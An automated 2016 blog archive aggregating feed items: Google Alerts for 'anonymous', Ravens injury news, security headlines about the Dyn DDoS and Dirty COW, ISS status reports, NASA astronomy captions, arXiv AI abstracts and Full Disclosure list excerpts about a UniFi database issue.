Latest YouTube Video

Saturday, October 22, 2016

Viagra Anonymous

Viagra Anonymous. Stock generics and brand name products will be listed side by side in our online pharmacies. 24h online support, Absolute ...

from Google Alert - anonymous http://ift.tt/2eFIkH4
via IFTTT

Ravens: QB Joe Flacco (shoulder) will be active for Sunday's game vs. Jets; was expected to be game-time decision (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous Art Auction

Truro School are to host an Anonymous Art Auction on Thursday 10th November, in order to raise funds for local charity 'The Wave Project'. The Wave ...

from Google Alert - anonymous http://ift.tt/2er7Z8H
via IFTTT

An Army of Million Hacked IoT Devices Almost Broke the Internet Today

A massive Distributed Denial of Service (DDoS) attack against Dyn, a major domain name system (DNS) provider, broke large portions of the Internet on Friday, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify. But how the attack happened? What's the cause behind the attack? Exact details of the attack remain


from The Hacker News http://ift.tt/2dXavQo
via IFTTT

Friday, October 21, 2016

Warriors' Thompson angered by anonymous 'coward'

Oct. 21-- Warriors guard Klay Thompson was a bit grumpy Friday morning. He blew his tire on the way to the practice facility. "Get ready for some short ...

from Google Alert - anonymous http://ift.tt/2epHjVT
via IFTTT

Ravens: Joe Flacco (shoulder) questionable and will be game-time decision Sunday at Jets; Steve Smith Sr. (ankle) out (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: Joe Flacco returns to practice Friday after missing past two days; showed no effects from injured right shoulder (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Royals, Rangers and Orioles rank among the top MLB teams in ESPN The Magazine's 2016 Ultimate Standings (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Massive DDoS Attack Against Dyn DNS Causes Major Outages to Popular Sites

Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one such attacks that cause a massive damage to any service. Recently, the Internet witnessed a record-breaking largest DDoS attack of over 1 Tbps against France-based hosting provider OVH, and now the latest victim of the attack is none other than Dyn DNS


from The Hacker News http://ift.tt/2dtj49v
via IFTTT

ISS Daily Summary Report – 10/20/2016

Group Combustion Troubleshooting: FE-5 resumed the troubleshooting on the Group Combustion Experiment Module (GCEM).  The crew removed the GCEM Combustion Chamber Element (CCE) from the Multi-Purpose Small Payload Rack (MSPR) rack and installed it on the Work Bench to verify the air supply line Quick Disconnect (QD) connections.  FE-5 then reinstalled the Combustion Chamber and performed leak checks with the GCEM installed in the MSPR.  Ground teams are reviewing data and high-resolution images prior to proceeding with further troubleshooting steps.  The Group Combustion investigation tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-purpose Small Payload Rack in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made.  USOS Crew Off Duty:  FE-5 and FE-6 have a reduced work day in preparation for a busy weekend.  Soyuz Operations are continuing nominally to support a 48S docking to the MRM2 Zenith port on Friday 21-October at 9:59 GMT.  Cygnus operations remain on track for capture and berthing to the ISS on Sunday 23-October.  Cygnus is carrying more than 2300 kg of supplies, crew provisions, and science experiments to the ISS.  Cygnus Unberth is currently planned for 18-November.   Today’s Planned Activities All activities were completed unless otherwise noted. ISS Crew and ГОГУ (RSA Flight Control Team) weekly conference Hardware prepack for return and disposal on Soyuz 731 СОЖ maintenance CARDIOVECTOR. Experiment Ops. Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Retrieval Measuring Partial CO Pressure at RS Central Post using US portable CSA-CP device Verification of ИП-1 Flow Sensor Position LBNP Training (PRELIMINARY) Combustion Chamber (CC) Air Supply Line Check Combustion Chamber (CC) Top Plate Attachment HRF Generic Frozen Blood Collection Setup Vozdukh Atmosphere Purification System switchover from mode 3 to mode 4. Microbial Capture Device (MCD) and Coliform Water Sample Analysis 44 +/- 4 hours post processing Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Installation Air Heater Fan (БВН) Screen Cleaning in Soyuz 731 Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 1 Trouble Shoot Food Frequency Questionnaire (FFQ) CALCIUM. Experiment Session 10 Marrow Breath And Ambient Air Sample Setup – Subject Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 2 Trouble Shoot ISS Crew departure preparation КОНТЕНТ. Experiment Run Completed Task List Items PMM Stowage Consolidation and Organization  Ground Activities All activities were completed unless otherwise noted. Nominal Ground Commanding N2 Distribution System Leak Check post MSPR operations  Three-Day Look Ahead: Friday, 10/21: 48S Docking, Airlock prep for Airway Monitoring Saturday, 10/22: Cygnus Capture OBT, Emergency Roles/Responsibilities Review, Crew Adaptation Sunday, 10/23: Cygnus Approach and Capture, Vestibule Outfitting QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Shutdown Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2eqCwRf
via IFTTT

"Fraud" payments for anonymous orders

Problem/Motivation We send "Anonymous" shopper reference to the Adyen for anonymous order. It is not correct and was mentioned by the Adyen ...

from Google Alert - anonymous http://ift.tt/2eA7xBv
via IFTTT

Georgetown Prep Receives $20 Million Gift From Anonymous Donor

Georgetown Prep, a Jesuit day and boarding school for boys in Bethesda, Maryland, has announced a $20 million gift from an anonymous donor.

from Google Alert - anonymous http://ift.tt/2dFSpVw
via IFTTT

You are less anonymous on the web than you think — much less.

If you still think you can be anonymous on the internet, a team of Stanford and Princeton researchers has news for you: You can't. Over the summer ...

from Google Alert - anonymous http://ift.tt/2eA7IN1
via IFTTT

Dirty COW — Critical Linux Kernel Flaw Being Exploited in the Wild

A nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. Dubbed "Dirty COW," the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously due to many reasons. First, it's very easy to develop exploits that


from The Hacker News http://ift.tt/2ecPwMs
via IFTTT

Ex-NSA Contractor Stole 50 TB of Data; Includes Top-Secret Hacking Tools

Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency. Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades. The stolen data that are at least 500


from The Hacker News http://ift.tt/2erDLA9
via IFTTT

network-anonymous-tor

network-anonymous-tor is a Haskell API for Tor anonymous networking. Depends on: attoparsec, base, base32string, bytestring, exceptions, hexstring ...

from Google Alert - anonymous http://ift.tt/2epGdq2
via IFTTT

The Tulip in the Swan


Framing a bright emission region this telescopic view looks out along the plane of our Milky Way Galaxy toward the nebula rich constellation Cygnus the Swan. Popularly called the Tulip Nebula, the glowing cloud of interstellar gas and dust is also found in the 1959 catalog by astronomer Stewart Sharpless as Sh2-101. About 8,000 light-years distant and 70 light-years across the complex and beautiful nebula blossoms at the center of the composite image. Red, green, and blue hues map emission from ionized sulfur, hydrogen, and oxygen atoms. Ultraviolet radiation from young, energetic stars at the edge of the Cygnus OB3 association, including O star HDE 227018, ionizes the atoms and powers the visible light emission from the Tulip Nebula. HDE 227018 is the bright star very near the blue arc at the center of the cosmic tulip. via NASA http://ift.tt/2dCMLmV

Thursday, October 20, 2016

anonymous-sums

anonymous-sums. Anonymous sum types http://ift.tt/1ZRRZuaanonymous-sums. Version on this page: 0.4.0.0. LTS Haskell 7.4: 0.4.0.0.

from Google Alert - anonymous http://ift.tt/2eMpPUY
via IFTTT

Maximizing positive opinion influence using an evidential approach. (arXiv:1610.06340v1 [cs.SI])

In this paper, we propose a new data based model for influence maximization in online social networks. We use the theory of belief functions to overcome the data imperfection problem. Besides, the proposed model searches to detect influencer users that adopt a positive opinion about the product, the idea, etc, to be propagated. Moreover, we present some experiments to show the performance of our model.



from cs.AI updates on arXiv.org http://ift.tt/2epbGc0
via IFTTT

Dynamic Probabilistic Network Based Human Action Recognition. (arXiv:1610.06395v1 [cs.CV])

This paper examines use of dynamic probabilistic networks (DPN) for human action recognition. The actions of lifting objects and walking in the room, sitting in the room and neutral standing pose were used for testing the classification. The research used the dynamic interrelation between various different regions of interest (ROI) on the human body (face, body, arms, legs) and the time series based events related to the these ROIs. This dynamic links are then used to recognize the human behavioral aspects in the scene. First a model is developed to identify the human activities in an indoor scene and this model is dependent on the key features and interlinks between the various dynamic events using DPNs. The sub ROI are classified with DPN to associate the combined interlink with a specific human activity. The recognition accuracy performance between indoor (controlled lighting conditions) is compared with the outdoor lighting conditions. The accuracy in outdoor scenes was lower than the controlled environment.



from cs.AI updates on arXiv.org http://ift.tt/2edaYDq
via IFTTT

A Growing Long-term Episodic & Semantic Memory. (arXiv:1610.06402v1 [cs.AI])

The long-term memory of most connectionist systems lies entirely in the weights of the system. Since the number of weights is typically fixed, this bounds the total amount of knowledge that can be learned and stored. Though this is not normally a problem for a neural network designed for a specific task, such a bound is undesirable for a system that continually learns over an open range of domains. To address this, we describe a lifelong learning system that leverages a fast, though non-differentiable, content-addressable memory which can be exploited to encode both a long history of sequential episodic knowledge and semantic knowledge over many episodes for an unbounded number of domains. This opens the door for investigation into transfer learning, and leveraging prior knowledge that has been learned over a lifetime of experiences to new domains.



from cs.AI updates on arXiv.org http://ift.tt/2eo3Ocf
via IFTTT

Exploiting inter-image similarity and ensemble of extreme learners for fixation prediction using deep features. (arXiv:1610.06449v1 [cs.CV])

This paper presents a novel fixation prediction and saliency modeling framework based on inter-image similarities and ensemble of Extreme Learning Machines (ELM). The proposed framework is inspired by two observations, 1) the contextual information of a scene along with low-level visual cues modulates attention, 2) the influence of scene memorability on eye movement patterns caused by the resemblance of a scene to a former visual experience. Motivated by such observations, we develop a framework that estimates the saliency of a given image using an ensemble of extreme learners, each trained on an image similar to the input image. That is, after retrieving a set of similar images for a given image, a saliency predictor is learnt from each of the images in the retrieved image set using an ELM, resulting in an ensemble. The saliency of the given image is then measured in terms of the mean of predicted saliency value by the ensemble's members.



from cs.AI updates on arXiv.org http://ift.tt/2epa4iB
via IFTTT

Reasoning with Memory Augmented Neural Networks for Language Comprehension. (arXiv:1610.06454v1 [cs.CL])

Hypothesis testing is an important cognitive process that supports human reasoning. In this paper, we introduce a computational hypothesis testing approach based on memory augmented neural networks. Our approach involves a hypothesis testing loop that reconsiders and progressively refines a previously formed hypothesis in order to generate new hypotheses to test. We apply the proposed approach to language comprehension task by using Neural Semantic Encoders (NSE). Our NSE models achieve the state-of-the-art results showing an absolute improvement of 1.2% to 2.6% accuracy over previous results obtained by single and ensemble systems on standard machine comprehension benchmarks such as the Children's Book Test (CBT) and Who-Did-What (WDW) news article datasets.



from cs.AI updates on arXiv.org http://ift.tt/2ebuOg3
via IFTTT

Generalized Interval-valued OWA Operators with Interval Weights Derived from Interval-valued Overlap Functions. (arXiv:1610.06473v1 [cs.AI])

In this work we extend to the interval-valued setting the notion of an overlap functions and we discuss a method which makes use of interval-valued overlap functions for constructing OWA operators with interval-valued weights. . Some properties of interval-valued overlap functions and the derived interval-valued OWA operators are analysed. We specially focus on the homogeneity and migrativity properties.



from cs.AI updates on arXiv.org http://ift.tt/2eLZO8b
via IFTTT

An Extended Neo-Fuzzy Neuron and its Adaptive Learning Algorithm. (arXiv:1610.06483v1 [cs.AI])

A modification of the neo-fuzzy neuron is proposed (an extended neo-fuzzy neuron (ENFN)) that is characterized by improved approximating properties. An adaptive learning algorithm is proposed that has both tracking and smoothing properties. An ENFN distinctive feature is its computational simplicity compared to other artificial neural networks and neuro-fuzzy systems.



from cs.AI updates on arXiv.org http://ift.tt/2eo51QZ
via IFTTT

An Evolving Cascade System Based on A Set Of Neo Fuzzy Nodes. (arXiv:1610.06484v1 [cs.AI])

Neo-fuzzy elements are used as nodes for an evolving cascade system. The proposed system can tune both its parameters and architecture in an online mode. It can be used for solving a wide range of Data Mining tasks (namely time series forecasting). The evolving cascade system with neo-fuzzy nodes can process rather large data sets with high speed and effectiveness.



from cs.AI updates on arXiv.org http://ift.tt/2eM24MO
via IFTTT

A Multidimensional Cascade Neuro-Fuzzy System with Neuron Pool Optimization in Each Cascade. (arXiv:1610.06485v1 [cs.AI])

A new architecture and learning algorithms for the multidimensional hybrid cascade neural network with neuron pool optimization in each cascade are proposed in this paper. The proposed system differs from the well-known cascade systems in its capability to process multidimensional time series in an online mode, which makes it possible to process non-stationary stochastic and chaotic signals with the required accuracy. Compared to conventional analogs, the proposed system provides computational simplicity and possesses both tracking and filtering capabilities.



from cs.AI updates on arXiv.org http://ift.tt/2eo7gE3
via IFTTT

Adaptive Forecasting of Non-Stationary Nonlinear Time Series Based on the Evolving Weighted Neuro-Neo-Fuzzy-ANARX-Model. (arXiv:1610.06486v1 [cs.AI])

An evolving weighted neuro-neo-fuzzy-ANARX model and its learning procedures are introduced in the article. This system is basically used for time series forecasting. This system may be considered as a pool of elements that process data in a parallel manner. The proposed evolving system may provide online processing data streams.



from cs.AI updates on arXiv.org http://ift.tt/2eM09rw
via IFTTT

An Evolving Neuro-Fuzzy System with Online Learning/Self-learning. (arXiv:1610.06488v1 [cs.AI])

An architecture of a new neuro-fuzzy system is proposed. The basic idea of this approach is to tune both synaptic weights and membership functions with the help of the supervised learning and self-learning paradigms. The approach to solving the problem has to do with evolving online neuro-fuzzy systems that can process data under uncertainty conditions. The results prove the effectiveness of the developed architecture and the learning procedure.



from cs.AI updates on arXiv.org http://ift.tt/2eo6iaN
via IFTTT

An Ensemble of Adaptive Neuro-Fuzzy Kohonen Networks for Online Data Stream Fuzzy Clustering. (arXiv:1610.06490v1 [cs.AI])

A new approach to data stream clustering with the help of an ensemble of adaptive neuro-fuzzy systems is proposed. The proposed ensemble is formed with adaptive neuro-fuzzy self-organizing Kohonen maps in a parallel processing mode. A final result is chosen by the best neuro-fuzzy self-organizing Kohonen map.



from cs.AI updates on arXiv.org http://ift.tt/2eM0Wsj
via IFTTT

Jointly Learning to Align and Convert Graphemes to Phonemes with Neural Attention Models. (arXiv:1610.06540v1 [cs.CL])

We propose an attention-enabled encoder-decoder model for the problem of grapheme-to-phoneme conversion. Most previous work has tackled the problem via joint sequence models that require explicit alignments for training. In contrast, the attention-enabled encoder-decoder model allows for jointly learning to align and convert characters to phonemes. We explore different types of attention models, including global and local attention, and our best models achieve state-of-the-art results on three standard data sets (CMUDict, Pronlex, and NetTalk).



from cs.AI updates on arXiv.org http://ift.tt/2drOmh7
via IFTTT

IDE0008 Do not offer explicit type instead of var for anonymous objects · Issue #14635

IDE0008 Do not offer explicit type instead of var for anonymous objects #14635. Open. miloush opened this Issue 34 minutes ago · 0 comments ...

from Google Alert - anonymous http://ift.tt/2e5FqvE
via IFTTT

"Society's Best Kept Secret": Jackie O's Anonymous Wedding Dress Designer

In 1898, Ann Lowe was born as the granddaughter of an enslaved dressmaker in Alabama. She learned to sew from her grandmother and mother, ...

from Google Alert - anonymous http://ift.tt/2exQdwI
via IFTTT

I have a new follower on Twitter


FirmRight



Following: 1969 - Followers: 581

October 20, 2016 at 04:01PM via Twitter http://twitter.com/FirmRight

Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach

2016 is the year of data breaches that has made almost every major companies victims to the cyber attacks, resulting in compromise of over billion of online users accounts. Weebly and Foursquare are the latest victims of the massive data breach, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.


from The Hacker News http://ift.tt/2eL6zr5
via IFTTT

Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach

2016 is the year of data breaches that has made almost every major companies victims to the cyber attacks, resulting in compromise of over billion of online users accounts. Weebly and Foursquare are the latest victims of the massive data breach, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.


from The Hacker News http://ift.tt/2eL6zr5
via IFTTT

Ravens: LB Elvis Dumervil (foot) believes he will play again in 2016, but has no timetable for return; "I wish I did" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Gamblers Anonymous

I had the opportunity to compete in this year's AIGA Command X design competition. I wasn't able to walk away with the win, but I learned a lot about ...

from Google Alert - anonymous http://ift.tt/2eob1aS
via IFTTT

MBRFilter — Open Source Tool to Protect Against 'Master Boot Record' Malware

Ransomware threat has risen exponentially so much that ransomware authors have started abusing the MBR in their attacks to lock down your entire computer instead of just encrypting your important files on hard drive. Talos team at Cisco Systems has released a free, open-source tool that protects the master boot record (MBR) sector of computers from modification by bootkits, ransomware, and


from The Hacker News http://ift.tt/2ekI5DC
via IFTTT

Ravens: QB Joe Flacco (shoulder) misses his second straight day of practice Thursday; injured Sunday vs. Giants (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Defense in depth -- the Microsoft way (part 45): filesystem redirection fails to redirect the application directory

Massive ATM Hack Hits 3.2 Million Indian Debit Cards — Change Your PIN Now!

India is undergoing the biggest data breaches to date with as many as 3.2 Million debit card details reportedly stolen from multiple banks and financial platforms. The massive financial breach has hit India's biggest banks including State Bank of India (SBI), HDFC Bank, Yes Bank, ICICI Bank and Axis, and customers are advised to change their ATM PIN immediately. Hackers allegedly used


from The Hacker News http://ift.tt/2ebrgg7
via IFTTT

Dios (Gaiser's Atheists Anonymous Remix)

Check out Dios (Gaiser's Atheists Anonymous Remix) by Oliver Huntemann, Dubfire, Gaiser on Beatport.

from Google Alert - anonymous http://ift.tt/2dD58bC
via IFTTT

ISS Daily Summary Report – 10/19/2016

Soyuz 48S Launch:  48S launched from the Baikonur Cosmodrome at GMT 293/08:05:14.378, carrying Expedition 49 crewmembers Shane Kimbrough, Andrei Borisenko, and Sergey Ryzhikov to the ISS.  Vehicle experienced a nominal ascent and all solar arrays and antennas successfully deployed. The Soyuz will perform a 34-orbit rendezvous before docking with the ISS on Friday, October 21 at 9:59 am GMT. Combustion Integration Rack (CIR) Remove and Replace (R&R): FE-6 disconnected the water umbilicals at the CIR Z-Panel, removing water pressure from the rack.  The crew then accessed and changed out the Multi-user Droplet Combustion Apparatus (MDCA) Supply and Return hoses.  Last week the rack was connected to the Vacuum Exhaust System to remove the water from within the CIR.  Today’s hose changeouts will enable the resumption of FLame Extinguishment-2 (FLEX-2) operations using a decane fuel and will position CIR for implementation of the Cool Flames Investigation (CFI) arriving on OA-5. The FLEX-2 experiment studies the rate and manner in which fuel is burned, the conditions that are necessary for soot to form, and the way in which a mixture of fuels evaporate before burning.  The results from these experiments will give scientists a better understanding how fires behave in space and will provide important information that will be useful in increasing the fuel efficiency of engines using liquid fuels. CFI provides new insight into the phenomenon where some types of fuels initially burn very hot, then appear to go out — but they continue burning at a much lower temperature, with no visible flames (cool flames). Understanding cool flame combustion helps scientists develop new engines and fuels that are more efficient and less harmful to the environment. Japanese Experiment Module (JEM) Ethernet Hub Unit Installation:  FE-6 installed the JEM Ethernet Hub Unit and connect Ethernet and power cables earlier today.  This will provide new capability of a redundant data line for the Medium Rate Data Link (MRDL). Today’s Planned Activities All activities were completed unless otherwise noted. МО-8. Setup Body Mass Measurement МО-8. Closeout Ops ISS CREW/SSIPC CONFERENCE Meteor Hard Drive Set Swap PILOT-T. Experiment Setup. JEM Ethernet Hub Unit Installation Meteor Hard Drive Gather PILOT-T. Experiment Session. Tropical Cyclone Hardware Closeout Combustion Integrated Rack Middle Panels Rack Doors Open Combustion Integrated Rack Front End Cap Open JEM Ethernet Hub Unit Ethernet Crossover Cable 5m Reconnection Multi-user Droplet Combustion Apparatus Water Hose Replace PILOT-T. Closeout Ops. Combustion Integrated Rack Front End Cap Close Combustion Integrated Rack Upper Rack Doors Close Soyuz 731 Sokol Suit Leak Check Drying of Sokol Suits (Soyuz 731), setting up suits 1 and 2 for drying Adjustment of Kentavr for Soyuz 731 crew Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Fill Part 3 СОЖ maintenance Crew Departure Preparations for Return to Earth OTKLIK. Hardware Monitoring Termination of space suits 1, 2 drying (Soyuz 731) Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Start drying of the 3rd space suit and set up the 1st pair of gloves for drying (Soyuz 731) Terminate drying of the 1st pair of gloves and start drying of the 2nd pair (Soyuz 731) Terminate drying of the 2nd pair of gloves (Soyuz 731) Dose Tracker Data Entry Subject Crew Departure Preparations for Return to Earth Terminate drying of the 3rd space suit, start drying of the 3rd pair of gloves (Soyuz 731) Flight Director/ISS CREW CONFERENCE Terminate drying of the 3rd pair of gloves (Soyuz 731) Space suits and gloves post-drying closeout ops (Soyuz 731) Completed Task List Items Wet Lab RNA SmartCycler Session 3 Ground Activities All activities were completed unless otherwise noted. Nominal Ground Commanding Three-Day Look Ahead: Thursday, 10/20: Off Duty Friday, 10/21: 48S Docking Saturday, 10/12: Cygnus Capture OBT, Emergency OBT, Crew Adaptation QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Shutdown Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2eUZd3r
via IFTTT

M45: The Pleiades Star Cluster


Have you ever seen the Pleiades star cluster? Even if you have, you probably have never seen it as dusty as this. Perhaps the most famous star cluster on the sky, the bright stars of the Pleiades can be seen without binoculars even from the heart of a light-polluted city. With a long exposure from a dark location, though, the dust cloud surrounding the Pleiades star cluster becomes very evident. The featured image was a long duration exposure taken last month from Namibia and covers a sky area many times the size of the full moon. Also known as the Seven Sisters and M45, the Pleiades lies about 400 light years away toward the constellation of the Bull (Taurus). A common legend with a modern twist is that one of the brighter stars faded since the cluster was named, leaving only six stars visible to the unaided eye. The actual number of visible Pleiades stars, however, may be more or less than seven, depending on the darkness of the surrounding sky and the clarity of the observer's eyesight. via NASA http://ift.tt/2el3RF8

Wednesday, October 19, 2016

Particle Swarm Optimization for Generating Fuzzy Reinforcement Learning Policies. (arXiv:1610.05984v1 [cs.NE])

Fuzzy controllers are known to serve as efficient and interpretable system controllers for continuous state and action spaces. To date these controllers have been constructed by hand, or automatically trained either on expert generated problem specific cost functions or by incorporating detailed knowledge about the optimal control strategy. Both requirements for automatic training processes are not given in the majority of real world reinforcement learning (RL) problems. We introduce a new particle swarm reinforcement learning (PSRL) approach which is capable of constructing fuzzy RL policies solely by training parameters on world models produced from randomly generated samples of the real system. This approach relates self-organizing fuzzy controllers to model-based RL for the first time. PSRL can be used straightforward on any RL problem, which is demonstrated on three standard RL benchmarks, mountain car, cart pole balancing and cart pole swing up. Our experiments yielded high performing and well interpretable fuzzy policies.



from cs.AI updates on arXiv.org http://ift.tt/2e2BtYH
via IFTTT

Constrained Cohort Intelligence using Static and Dynamic Penalty Function Approach for Mechanical Components Design. (arXiv:1610.06009v1 [cs.AI])

Most of the metaheuristics can efficiently solve unconstrained problems; however, their performance may degenerate if the constraints are involved. This paper proposes two constraint handling approaches for an emerging metaheuristic of Cohort Intelligence (CI). More specifically CI with static penalty function approach (SCI) and CI with dynamic penalty function approach (DCI) are proposed. The approaches have been tested by solving several constrained test problems. The performance of the SCI and DCI have been compared with algorithms like GA, PSO, ABC, d-Ds. In addition, as well as three real world problems from mechanical engineering domain with improved solutions. The results were satisfactory and validated the applicability of CI methodology for solving real world problems.



from cs.AI updates on arXiv.org http://ift.tt/2elCxdz
via IFTTT

Fairness as a Program Property. (arXiv:1610.06067v1 [cs.PL])

We explore the following question: Is a decision-making program fair, for some useful definition of fairness? First, we describe how several algorithmic fairness questions can be phrased as program verification problems. Second, we discuss an automated verification technique for proving or disproving fairness of decision-making programs with respect to a probabilistic model of the population.



from cs.AI updates on arXiv.org http://ift.tt/2drn2uo
via IFTTT

Recognizing Semantic Features in Faces using Deep Learning. (arXiv:1512.00743v2 [cs.LG] UPDATED)

The human face constantly conveys information, both consciously and subconsciously. However, as basic as it is for humans to visually interpret this information, it is quite a big challenge for machines. Conventional semantic facial feature recognition and analysis techniques are already in use and are based on physiological heuristics, but they suffer from lack of robustness and high computation time. This thesis aims to explore ways for machines to learn to interpret semantic information available in faces in an automated manner without requiring manual design of feature detectors, using the approach of Deep Learning. This thesis provides a study of the effects of various factors and hyper-parameters of deep neural networks in the process of determining an optimal network configuration for the task of semantic facial feature recognition. This thesis explores the effectiveness of the system to recognize the various semantic features (like emotions, age, gender, ethnicity etc.) present in faces. Furthermore, the relation between the effect of high-level concepts on low level features is explored through an analysis of the similarities in low-level descriptors of different semantic features. This thesis also demonstrates a novel idea of using a deep network to generate 3-D Active Appearance Models of faces from real-world 2-D images.

For a more detailed report on this work, please see [arXiv:1512.00743v1].



from cs.AI updates on arXiv.org http://ift.tt/1XIqQYm
via IFTTT

Human Pose Estimation in Space and Time using 3D CNN. (arXiv:1609.00036v3 [cs.CV] UPDATED)

This paper explores the capabilities of convolutional neural networks to deal with a task that is easily manageable for humans: perceiving 3D pose of a human body from varying angles. However, in our approach, we are restricted to using a monocular vision system. For this purpose, we apply a convolutional neural network approach on RGB videos and extend it to three dimensional convolutions. This is done via encoding the time dimension in videos as the 3\ts{rd} dimension in convolutional space, and directly regressing to human body joint positions in 3D coordinate space. This research shows the ability of such a network to achieve state-of-the-art performance on the selected Human3.6M dataset, thus demonstrating the possibility of successfully representing temporal data with an additional dimension in the convolutional operation.



from cs.AI updates on arXiv.org http://ift.tt/2bUFCuM
via IFTTT

Learning to learn with backpropagation of Hebbian plasticity. (arXiv:1609.02228v2 [cs.NE] UPDATED)

Hebbian plasticity is a powerful principle that allows biological brains to learn from their lifetime experience. By contrast, artificial neural networks trained with backpropagation generally have fixed connection weights that do not change once training is complete. While recent methods can endow neural networks with long-term memories, Hebbian plasticity is currently not amenable to gradient descent. Here we derive analytical expressions for activity gradients in neural networks with Hebbian plastic connections. Using these expressions, we can use backpropagation to train not just the baseline weights of the connections, but also their plasticity. As a result, the networks "learn how to learn" in order to solve the problem at hand: the trained networks automatically perform fast learning of unpredictable environmental features during their lifetime, expanding the range of solvable problems. We test the algorithm on various on-line learning tasks, including pattern completion, one-shot learning, and reversal learning. The algorithm successfully learns how to learn the relevant associations from one-shot instruction, and fine-tunes the temporal dynamics of plasticity to allow for continual learning in response to changing environmental parameters. We conclude that backpropagation of Hebbian plasticity offers a powerful model for lifelong learning.



from cs.AI updates on arXiv.org http://ift.tt/2cxDnyC
via IFTTT

Re: [FD] Critical Vulnerability in Ubiquiti UniFi

Tim conflates two products in his original report: Product: UniFi AP AC Lite Vendor: Ubiquiti Networks Inc. Internal reference: ? (Bug ID) Vulnerability type: Incorrect access control Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested) [...] Both the UniFi appliance line and the AP management software are properly spelled 'UniFi'. http://ift.tt/1OPzKlx http://ift.tt/21BKwPK UniFi - the AP controller software - does not run on the UniFi AP AC Lite. It's intended as a low-cost replacement for a dedicated AP controller appliance, and it manages - does not run on - Ubiquiti's current AP product line. The current full release version of the UniFi AP controller is 5.2.9. It has a dedicated appliance in the form of the "Cloud Key" - https://www.ubnt.com/ unifi/unifi-cloud-key/ The Cloud Key is a cute little package with some integral flash, a micro SD slot, PoE or USB power, and a MediaTek MT7623 SoC - if the picture is accurate. Its sole purpose in life appears to be running the UniFi controller software. I don't have one to test; the Cloud Key may well configure MongoDB insecurely. I have access to a few other UniFi products, so I looked them over. The self- hosted UniFi controller appears to call MongoDB correctly, at least as of 5.2.9: john@malkovich ~ [0]# pgrep -a mongo 2850 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --logappend

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Critical Vulnerability in Ubiquiti UniFi

[FD] Ubiquiti

Hi, please let us communicate directly and not via Mailinglists, because this results in flooding and is not important to all other people. If there is an final result, weather the PoC has got an mistake or not, we can publish the result. If there are other products affected we don’t know - this was not mentioned in the disclosure (The PoC is only for the OS X Software combined with an AP AC Lite), so we can’t give an statement to other products of the vendor. If nobody is able to get the PoC working, like I said above, maby we made an mistake, I will not distance me from making a mistake, I think the vuln should not be seen as too critical. But what you all approved is that if the database runs locally the following scenario should be bullet proof: All, by the management software, managed devices could be compromised if the pc get’s infected, because the database has absolutely no authentication and you are able to reset the local admins web interface password. This would reduce the CVSSv3 to 6.3 and change they vuln type to „privilege escalation“, combined with broken authentication even without an "scope change": CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H Do you agree? I’m looking forward to minimize our "race time condition denial of service", to deliver fast results in future :-P Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple Vulnerabilities in Plone CMS

[FD] Evernote for Windows DLL Loading Remote Code Execution

[FD] Defense in depth -- the Microsoft way (part 44): complete failure of Windows Update

[FD] CVE-2016-7999: SPIP 3.1.2 Server Side Request Forgery

